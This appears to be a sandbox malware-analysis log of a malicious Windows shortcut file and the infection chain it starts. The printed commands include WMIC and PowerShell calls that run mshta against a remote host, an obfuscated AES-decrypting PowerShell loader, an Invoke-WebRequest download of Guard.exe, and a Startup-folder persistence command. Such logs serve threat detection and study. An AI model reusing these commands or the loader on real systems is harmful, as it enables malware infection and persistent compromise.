Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADCB17C015_2_00007FF7ADCB17C0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC3175015_2_00007FF7ADC31750
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC932AC15_2_00007FF7ADC932AC
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC4529C15_2_00007FF7ADC4529C
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC0B39015_2_00007FF7ADC0B390
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B5B02023_2_00B5B020
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B594E023_2_00B594E0
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B59C8023_2_00B59C80
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B723F523_2_00B723F5
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BD840023_2_00BD8400
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B8650223_2_00B86502
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B5E6F023_2_00B5E6F0
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B8265E23_2_00B8265E
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B7282A23_2_00B7282A
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B889BF23_2_00B889BF
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BD0A3A23_2_00BD0A3A
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B86A7423_2_00B86A74
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B60BE023_2_00B60BE0
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BAEDB223_2_00BAEDB2
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B7CD5123_2_00B7CD51
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BD0EB723_2_00BD0EB7
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BB8E4423_2_00BB8E44
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B86FE623_2_00B86FE6
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B733B723_2_00B733B7
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B7F40923_2_00B7F409
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B6D45D23_2_00B6D45D
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B716B423_2_00B716B4
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B5F6A023_2_00B5F6A0
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B6F62823_2_00B6F628
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B5166323_2_00B51663
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B778C323_2_00B778C3
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B7DBA523_2_00B7DBA5
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B71BA823_2_00B71BA8
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B89CE523_2_00B89CE5
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B6DD2823_2_00B6DD28
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B7BFD623_2_00B7BFD6
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B71FC023_2_00B71FC0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_007FB02027_2_007FB020
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_007F94E027_2_007F94E0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_007F9C8027_2_007F9C80
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_008123F527_2_008123F5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0087840027_2_00878400
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0082650227_2_00826502
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_007FE6F027_2_007FE6F0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0082265E27_2_0082265E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0081282A27_2_0081282A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_008289BF27_2_008289BF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00870A3A27_2_00870A3A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00826A7427_2_00826A74
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00800BE027_2_00800BE0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0084EDB227_2_0084EDB2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0081CD5127_2_0081CD51
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00870EB727_2_00870EB7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00858E4427_2_00858E44
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00826FE627_2_00826FE6
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_008133B727_2_008133B7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0081F40927_2_0081F409
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0080D45D27_2_0080D45D
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_007F166327_2_007F1663
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_008116B427_2_008116B4
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0080F62827_2_0080F628
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_007FF6A027_2_007FF6A0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_008178C327_2_008178C3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0081DBA527_2_0081DBA5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00811BA827_2_00811BA8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00829CE527_2_00829CE5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0080DD2827_2_0080DD28
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00811FC027_2_00811FC0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0081BFD627_2_0081BFD6
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Guard.exe D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: String function: 00007FF7ADC28D58 appears 76 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00B78B30 appears 42 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00B70D17 appears 70 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00B61A36 appears 34 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00810D17 appears 70 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00801A36 appears 34 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00818B30 appears 42 times
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2584
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2584Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ghep2412_2[1], type: DROPPEDMatched rule: emmenhtal_strings_hta_exe author = Sekoia.io, description = Emmenhtal Loader string, creation_date = 2024-09-06, classification = TLP:CLEAR, version = 1.0, id = 64e08610-e8a4-4edd-8f6b-d4e8d2b47d87, hash = e86a22f1c73b85678e64341427c7193ba65903f3c0f29af2e65d7c56d833d912
Source: classification engineClassification label: mal100.expl.evad.winLNK@43/71@5/2
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC83778 GetLastError,FormatMessageW,15_2_00007FF7ADC83778
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC6CCE0 AdjustTokenPrivileges,CloseHandle,15_2_00007FF7ADC6CCE0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC6D5CC LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,15_2_00007FF7ADC6D5CC
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BA8DE9 AdjustTokenPrivileges,CloseHandle,23_2_00BA8DE9
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BA9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,23_2_00BA9399
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00848DE9 AdjustTokenPrivileges,CloseHandle,27_2_00848DE9
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00849399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,27_2_00849399
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC859D8 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,15_2_00007FF7ADC859D8
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC9EB34 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,15_2_00007FF7ADC9EB34
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC86D04 CoInitialize,CoCreateInstance,CoUninitialize,15_2_00007FF7ADC86D04
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC06580 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,15_2_00007FF7ADC06580
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ghep2412_2[1]Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8652:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8384:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zfxa4dp1.4si.ps1Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: n5Szx8qsFB.lnkVirustotal: Detection: 29%
Source: n5Szx8qsFB.lnkReversingLabs: Detection: 21%
Source: unknownProcess created: C:\Windows\System32\wbem\WMIC.exe "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2')"
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/ghep2412_2"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/ghep2412_2
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '14C80253B9AE5AEAA5DE24659F01D509CF460EE458FB49BF1D72DCB2E4749D746CD9DB27687A100C104C20E190D5CF617E269315FBABFADF12B96DC56A539AF812E893ACB6CACEE8771B90DE79966EA8AF49671C6138083807E7ACDC68E3EC61353DA1434E399CB7632B9BE90E97EAB29FCB7B35D422611B152F95CF04BE80F6B6A45FAFDC6497291682B5C7802B6FCA42509A896D18EA54CB45505CFD7A1C8C74E685914F86C731E1558FF417EC92A2DC9D23F19EB3FCF043A58389E6E7429A89F779599FAFF7153337ADEF7092F87CFD41560B4925E53F92549F33E8B6DC1B08F41B72E964F2ADE2038B32A7DDA6BB4275B72C7CB61D2D3262561B559438D772E33F25EA16A4F4A5B37E3A1E2D30FAA7136E1F92B62F8D942D07912ED348FF9FAF50222803F5EDC5A7672C4130832A45ACB7D486ACF004A4FD70C7A759323981C20A626A900DA5D54CA9800F53C7C7F583F68FFAF098F3B5D3E55A04183E536B28D4AB10FA71047408FD900EC8BC319B08354FE06CAF885C495BED4038E9B3A38F15966CD61A13D4B4829EDC2B5CF872096790A6EEE474238D344D3E50A48B24E4147A525127583AEFFDAB1B1445A14B25869F58430AFE067B1717ACB8EE6FC03DB8BFC4E85494A735B2E5D5529B7F210A86B8968AA5A635BA3167A33F53D93117B8DABA13FEAEC806D04696D012179652DA2D00ED0DB378B1ADB5CCB6887EECFB415501C8B4AB4951E2E3C3A7B58210300BA633883134A2133BCFFB77A40A2CF71261E5C96AF138F818430C5F1950F662436CD9AB039C3010D102AE11667EE05A1FDE3F9D09DF9360A597BC3C17258CC4D59068E1608C9CD7EB29317D774A9ACD572A82D448993812D247A035CF0A3BE7E66E208C657B495D80C5C8FD08AFAEDC1DADB422C48F0CF4A018846F9095299885F66C8E77A16BD3E2D37370BF39F9612227FB24AED54EBC2A16B61240CF5F60839C1E68488B7168C818D4C7C06BD77114FD81636E45EEB0BE6C7D88F9A3100B861CFA70C3F20C85841CB6A80D7FF297E85CBB5621B570F71F29D5040E8D4065899B69E3B0487DD296D8050D2B13F86636C3E0DA27F5B9B38C6EBC9099B3240A5CF588B5516E4730275575A0CF69FFC20A1D3A74FBDAFF1A89C281470E9679791BB282902F01BE778EA837392E23BB96C69B92CAB14848DA247807327413F8E070DEB759C8C6DB84B6F1261895C9DF9E65A07AAD48D9CD1112B002F7E2FD2DB430C92A840AD1C8DD0E9F928700F8441FD7ECB8F92AA178D7809945E9E75ED50BD667AB11BFBBE97A68416CEDF4B67B3282C1E3CCDED973182C3D93E0496E2078AC02F08663A5197CBA0AC63D871B3C79ED71FAB6A005D12988DC3DB05908BBA6B8228970FBB9CF0DFB509FD035E017339D4B70C11381B124CECE98E86BEAD02376FF7BB51EB69151C7FFB32FF35D6D51786E6954554352414D6A5562644B';function vyG ($mgZiHqt){return -split ($mgZiHqt -replace '..', '0x$& ')};$WAvg = vyG($ddg.SubString(0, 2048));$SKz = [System.Security.Cryptography.Aes]::Create();$SKz.Key = vyG($ddg.SubString(2048));$SKz.IV = New-Object byte[] 16;$mZouvbL = $SKz.CreateDecryptor();$KbnMJip = [System.String]::new($mZouvbL.TransformFinalBlock($WAvg, 0,$WAvg.Length)); sal fd $KbnMJip.Substring(3,3); fd $KbnMJip.Substring(6)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Project_Information.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1584,i,8641109857703384737,8271461273470373674,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\XKIZdXAs.exe "C:\Users\user\AppData\Roaming\XKIZdXAs.exe"
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/ghep2412_2"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/ghep2412_2Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '14C80253B9AE5AEAA5DE24659F01D509CF460EE458FB49BF1D72DCB2E4749D746CD9DB27687A100C104C20E190D5CF617E269315FBABFADF12B96DC56A539AF812E893ACB6CACEE8771B90DE79966EA8AF49671C6138083807E7ACDC68E3EC61353DA1434E399CB7632B9BE90E97EAB29FCB7B35D422611B152F95CF04BE80F6B6A45FAFDC6497291682B5C7802B6FCA42509A896D18EA54CB45505CFD7A1C8C74E685914F86C731E1558FF417EC92A2DC9D23F19EB3FCF043A58389E6E7429A89F779599FAFF7153337ADEF7092F87CFD41560B4925E53F92549F33E8B6DC1B08F41B72E964F2ADE2038B32A7DDA6BB4275B72C7CB61D2D3262561B559438D772E33F25EA16A4F4A5B37E3A1E2D30FAA7136E1F92B62F8D942D07912ED348FF9FAF50222803F5EDC5A7672C4130832A45ACB7D486ACF004A4FD70C7A759323981C20A626A900DA5D54CA9800F53C7C7F583F68FFAF098F3B5D3E55A04183E536B28D4AB10FA71047408FD900EC8BC319B08354FE06CAF885C495BED4038E9B3A38F15966CD61A13D4B4829EDC2B5CF872096790A6EEE474238D344D3E50A48B24E4147A525127583AEFFDAB1B1445A14B25869F58430AFE067B1717ACB8EE6FC03DB8BFC4E85494A735B2E5D5529B7F210A86B8968AA5A635BA3167A33F53D93117B8DABA13FEAEC806D04696D012179652DA2D00ED0DB378B1ADB5CCB6887EECFB415501C8B4AB4951E2E3C3A7B58210300BA633883134A2133BCFFB77A40A2CF71261E5C96AF138F818430C5F1950F662436CD9AB039C3010D102AE11667EE05A1FDE3F9D09DF9360A597BC3C17258CC4D59068E1608C9CD7EB29317D774A9ACD572A82D448993812D247A035CF0A3BE7E66E208C657B495D80C5C8FD08AFAEDC1DADB422C48F0CF4A018846F9095299885F66C8E77A16BD3E2D37370BF39F9612227FB24AED54EBC2A16B61240CF5F60839C1E68488B7168C818D4C7C06BD77114FD81636E45EEB0BE6C7D88F9A3100B861CFA70C3F20C85841CB6A80D7FF297E85CBB5621B570F71F29D5040E8D4065899B69E3B0487DD296D8050D2B13F86636C3E0DA27F5B9B38C6EBC9099B3240A5CF588B5516E4730275575A0CF69FFC20A1D3A74FBDAFF1A89C281470E9679791BB282902F01BE778EA837392E23BB96C69B92CAB14848DA247807327413F8E070DEB759C8C6DB84B6F1261895C9DF9E65A07AAD48D9CD1112B002F7E2FD2DB430C92A840AD1C8DD0E9F928700F8441FD7ECB8F92AA178D7809945E9E75ED50BD667AB11BFBBE97A68416CEDF4B67B3282C1E3CCDED973182C3D93E0496E2078AC02F08663A5197CBA0AC63D871B3C79ED71FAB6A005D12988DC3DB05908BBA6B8228970FBB9CF0DFB509FD035E017339D4B70C11381B124CECE98E86BEAD02376FF7BB51EB69151C7FFB32FF35D6D51786E6954554352414D6A5562644B';function vyG ($mgZiHqt){return -split ($mgZiHqt -replace '..', '0x$& ')};$WAvg = vyG($ddg.SubString(0, 2048));$SKz = [System.Security.Cryptography.Aes]::Create();$SKz.Key = vyG($ddg.SubString(2048));$SKz.IV = New-Object byte[] 16;$mZouvbL = $SKz.CreateDecryptor();$KbnMJip = [System.String]::new($mZouvbL.TransformFinalBlock($WAvg, 0,$WAvg.Length)); sal fd $KbnMJip.Substring(3,3); fd $KbnMJip.Substring(6)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Project_Information.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\XKIZdXAs.exe "C:\Users\user\AppData\Roaming\XKIZdXAs.exe" Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1584,i,8641109857703384737,8271461273470373674,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
